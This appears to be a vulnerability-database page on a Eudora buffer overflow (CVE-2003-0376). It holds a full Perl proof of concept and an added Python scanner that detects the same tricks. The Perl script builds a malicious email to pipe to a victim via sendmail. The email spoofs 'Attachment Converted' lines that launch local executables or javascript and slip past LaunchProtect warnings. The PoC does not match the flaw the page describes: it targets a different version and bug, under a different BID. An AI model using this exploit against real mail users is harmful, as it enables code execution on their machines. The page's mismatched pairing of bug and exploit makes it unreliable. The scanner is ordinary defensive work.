Eudora Buffer Overflow Vulnerability

Vulnerability ID: 1107583  Type: buffer overflow
Published: 2003-11-12  Updated: 2003-11-12
CVE: CVE-2003-0376
CNNVD-ID: CNNVD-200306-072
Platform: Windows  CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/23374
https://www.securityfocus.com/bid/87123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-072
|Details
Eudora 5.2.1 contains a buffer overflow. A remote attacker can cause a denial of service (crash, and the client then fails to restart) and possibly execute arbitrary code via an AttachmentConverted parameter that contains a very large number of . (dot) characters.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/9026/info

A vulnerability has been reported by Qualcomm that may be exploited by a remote attacker to cause the Eudora e-mail client to crash. It has been reported that a malicious email that contains a spoofed attachment converted line will trigger this issue in a vulnerable release of Eudora when the malicious message is viewed. 

#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "Pipe the output of this script into:   sendmail -i victim\n";

print "\nWith spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
CR=\\x0d characters get converted internally into a NUL=\\x00 and ignored,
so we can spoof \"attachment converted\" lines:\n";

print "\nThe following work fine (but are boring and/or put up warnings):\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
print "(Note how JavaScript is done with IE, web with default browser Netscape)\n";
print "Attachment Converted\r: <A href=javascript:alert(%27hello%27)>hello.txt</a>\n";
print "Attachment Converted\r: <A href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n";

print "\nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:\n";
print "Attachment Converted\r: <A href=H:/eudora/attach/calc>file.txt</a>\n";

print "\nCuteness value only:\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references. Any way to exploit this?
</x-html>\n";

print "\n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>\n";

print "\nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:\n\n";
print "HTML\n";
print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
print "Rich\n";
print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
print "Flowed\n";
print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";

print "\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"plain.txt\"\n";
print "Content-Transfer-Encoding: 7bit\n";
print "Content-Disposition: inline; filename=\"plain.txt\"\n";
print "\n";
print "Within a 'plain' attachment:\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"qp.txt\"\n";
print "Content-Transfer-Encoding: quoted-printable\n";
print "Content-Disposition: inline; filename=\"qp.txt\"\n";
print "\n";
print "Within quoted-printable encoded parts still need the embedded CR:\n";
print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
# Inside a base64 part the marker needs no embedded CR; the lines are CR-NL terminated.
$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r\nwithout embedded CR (but line termination is CR-NL):\r\nAttachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
print encode_base64($z);

print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "\n=====\n";

$X = 'README'; $Y = "$X.bat";
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
# uuencoded attachment body: 'begin' line, packed data, terminator and 'end'
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LaunchProtect warning):\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";

print "\n=====\n";

print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:\n";
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
print "Attachment Converted\r: c:/winnt/system32/calc\n";

print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
print "These elicit warnings:\n";
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme.txt</a>\n";
print "Attachment Converted\r: h:/eudora/attach/README\n";
print "Attachment Converted\r: \\README\n";
print "Attachment Converted\r: .\\README\n";
print "Attachment Converted\r: \\.\\README\n";
print "Attachment Converted\r: ?\\README\n";
print "Attachment Converted\r: \\?\\README\n";
print "while these do the bad thing without warning:\n";
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";

print "
For the default setup, Eudora knows that C:\\Program Files
and C:\\Progra~1 are the same thing:\n";
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";
print "
and also knows that various UNC references:
\\\\localhost\\c...
\\\\127.0.0.1\\c...
\\\\BIOSNAME\\c...
\\\\DNSNAME\\c...
\\\\IP\\c...
\\\\\\?\\c...
\\\\c...
...c:\\progr...
...c\\progr...
...c:progr...
...program files\\...
...progra~1\\...
or even
.\\NoSuchDir\\..\\README
//c|\\Program Files\\qualcomm\\eudora\\attach\\README
\\\\c|\\Program Files\\qualcomm\\eudora\\attach\\README
res://c:\\Program Files\\qualcomm\\eudora\\attach\\README
res:\\\\c:\\Program Files\\qualcomm\\eudora\\attach\\README
shell:Fonts\\..\\..\\Program Files\\qualcomm\\eudora\\attach\\README
%ProgramFiles%\\qualcomm\\eudora\\attach\\README
%windir%\\..\\Program Files\\qualcomm\\eudora\\attach\\README
are all the same thing...
";

print "\n";
print "\n--zzz--\n";
print "\n";
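As an added defensive example, written for this page and not code from the exploit-db post, from Qualcomm or from the vulnerability database, the Python script below scans a MIME message for "Attachment Converted" lines using the same client behaviours the PoC above relies on: a CR embedded before the colon is dropped, an empty <x-html>, <x-rich> or <x-flowed> wrapper in front of the line is invisible, and quoted-printable or base64 parts are decoded before the marker is searched for. It also counts the dots in the converted path as a heuristic for the many-dot DoS pattern described in the details section. The function names (scan_message, as_displayed, build_sample_message), the DOT_THRESHOLD value and the sample message are my own constructed assumptions, not values from the page.

```python
import base64
import email
import re
from email import policy

# Regex for the marker line as the client would see it after its own cleanup.
MARKER = re.compile(r"^[ \t]*Attachment Converted[ \t]*:[ \t]*(.*)$",
                    re.IGNORECASE | re.MULTILINE)
# Empty <x-...></x-...> wrappers that hide the marker without an embedded CR.
EMPTY_WRAPPER = re.compile(r"<x-(html|rich|flowed)>[ \t]*</x-\1>", re.IGNORECASE)
# Assumed cut-off for the "very many dots" DoS pattern (not a documented limit).
DOT_THRESHOLD = 64


def as_displayed(text: str) -> str:
    """Approximate what the vulnerable client renders: CR bytes are dropped
    (the PoC says they become NUL and are ignored) and empty wrappers vanish."""
    return EMPTY_WRAPPER.sub("", text.replace("\r", ""))


def scan_message(raw: bytes) -> list:
    """Return one finding per 'Attachment Converted' line in any text part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for idx, part in enumerate(msg.walk()):
        if part.get_content_maintype() != "text":
            continue
        # get_content() undoes the Content-Transfer-Encoding (7bit, QP, base64)
        decoded = part.get_content()
        # Lines exactly as transmitted (minus a CR that is only a line ending)
        raw_lines = {ln.rstrip("\r") for ln in decoded.split("\n")}
        for m in MARKER.finditer(as_displayed(decoded)):
            target = m.group(1).strip()
            findings.append({
                "part": idx,
                "filename": part.get_filename(),
                "cte": str(part.get("Content-Transfer-Encoding", "7bit")).strip().lower(),
                "target": target,
                # True when the line only becomes a marker after CR/wrapper
                # stripping, i.e. the sender deliberately disguised it
                "hidden": m.group(0) not in raw_lines,
                "dot_flood": target.count(".") >= DOT_THRESHOLD,
            })
    return findings


def build_sample_message() -> bytes:
    """Constructed test message (not a real capture) that reuses the PoC's
    hiding tricks: embedded CR, empty wrapper, QP and base64 parts, plus a
    many-dot path for the DoS heuristic."""
    b64_body = base64.b64encode(
        b'Attachment Converted: "c:\\winnt\\system32\\calc.exe"\r\n').decode()
    dots = "." * 200  # constructed excessive-dot target
    lines = [
        "From: me",
        "To: you",
        "Subject: constructed sample",
        "MIME-Version: 1.0",
        'Content-Type: multipart/mixed; boundary="zzz"',
        "",
        "--zzz",
        "Content-Type: text/plain",
        "Content-Transfer-Encoding: 7bit",
        "",
        "Attachment Converted: c:/honest/report.txt",            # no trick
        'Attachment Converted\r: "c:\\winnt\\system32\\calc.exe"',  # embedded CR
        '<x-html></x-html>Attachment Converted: "xyz"',           # empty wrapper
        "--zzz",
        'Content-Type: text/plain; name="qp.txt"',
        "Content-Transfer-Encoding: quoted-printable",
        "",
        '=41ttachment=20=43onverted\r=3a "c:\\winnt\\system32\\calc.exe"',
        "--zzz",
        'Content-Type: text/plain; name="b64.txt"',
        "Content-Transfer-Encoding: base64",
        "",
        b64_body,
        "--zzz",
        "Content-Type: text/plain",
        "",
        f"Attachment Converted: c:\\{dots}\\x.exe",
        "--zzz--",
        "",
    ]
    return "\n".join(lines).encode("ascii")


if __name__ == "__main__":
    for f in scan_message(build_sample_message()):
        print(f)
```

Run it as-is to scan the constructed message, or call scan_message() on the bytes of a real .eml file; any hit with hidden=True or an encoded part (cte of quoted-printable or base64) carrying the marker is the spoofing pattern from the PoC, and dot_flood=True is the DoS pattern from the details section. Rendering clients should never trust an "Attachment Converted" line that arrives in the body, which is the underlying fix.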
|Affected products
Qualcomm Eudora 5.2.1
|References

Source: BUGTRAQ
Name: 20030523 Eudora 5.2.1 buffer overflow DoS
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105370625529452&w=2
